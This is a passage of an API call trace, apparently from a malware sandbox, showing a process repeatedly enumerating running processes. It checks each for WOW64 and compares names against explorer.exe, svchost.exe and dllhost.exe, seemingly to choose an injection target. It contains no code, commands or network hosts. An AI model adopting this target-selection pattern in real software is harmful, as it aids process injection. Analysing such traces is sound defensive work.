(hObject=0xd8) returned 1 [0206.419] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0206.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0206.419] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.419] CloseHandle (hObject=0xd8) returned 1 [0206.419] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0206.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0206.420] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.420] CloseHandle (hObject=0xd8) returned 1 [0206.420] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0206.421] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0206.421] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0206.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0206.422] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0206.422] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0206.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0206.423] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0206.423] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0206.424] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.424] CloseHandle (hObject=0xd8) returned 1 [0206.424] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0206.424] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0206.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0206.424] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.424] CloseHandle (hObject=0xd8) returned 1 [0206.424] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0206.424] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0206.424] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0206.425] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0206.425] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0206.426] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.426] CloseHandle (hObject=0xd8) returned 1 [0206.426] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0206.426] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.426] CloseHandle (hObject=0xd8) returned 1 [0206.426] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0206.426] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0206.427] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.427] CloseHandle (hObject=0xd8) returned 1 [0206.427] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.427] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0206.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0206.475] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.475] CloseHandle (hObject=0xd8) returned 1 [0206.475] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0206.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0206.476] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0206.476] CloseHandle (hObject=0xd4) returned 1 [0206.476] Sleep (dwMilliseconds=0x3e8) [0207.536] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0207.538] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0207.539] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0207.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0207.539] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0207.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0207.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0207.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0207.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0207.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0207.541] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0207.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0207.541] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0207.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0207.542] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0207.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0207.542] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0207.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0207.543] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0207.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0207.543] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0207.544] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0207.544] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0207.545] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0207.545] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0207.546] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0207.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0207.546] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0207.547] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0207.547] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0207.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0207.548] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.548] CloseHandle (hObject=0xd8) returned 1 [0207.548] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0207.548] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0207.548] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0207.548] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0207.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0207.548] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0207.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0207.549] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.549] CloseHandle (hObject=0xd8) returned 1 [0207.549] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0207.549] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0207.549] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0207.549] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0207.549] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0207.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0207.550] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0207.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0207.550] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.550] CloseHandle (hObject=0xd8) returned 1 [0207.550] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0207.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0207.551] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.551] CloseHandle (hObject=0xd8) returned 1 [0207.551] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0207.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0207.552] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.552] CloseHandle (hObject=0xd8) returned 1 [0207.552] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0207.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0207.552] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.552] CloseHandle (hObject=0xd8) returned 1 [0207.552] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0207.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0207.553] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.553] CloseHandle (hObject=0xd8) returned 1 [0207.553] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0207.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0207.553] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.553] CloseHandle (hObject=0xd8) returned 1 [0207.554] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0207.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0207.554] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.554] CloseHandle (hObject=0xd8) returned 1 [0207.554] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0207.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0207.555] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.555] CloseHandle (hObject=0xd8) returned 1 [0207.555] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0207.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0207.555] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.555] CloseHandle (hObject=0xd8) returned 1 [0207.555] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0207.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0207.556] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.556] CloseHandle (hObject=0xd8) returned 1 [0207.556] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0207.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0207.556] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.556] CloseHandle (hObject=0xd8) returned 1 [0207.556] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0207.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0207.557] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0207.557] CloseHandle (hObject=0xd8) returned 1 [0207.557] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, 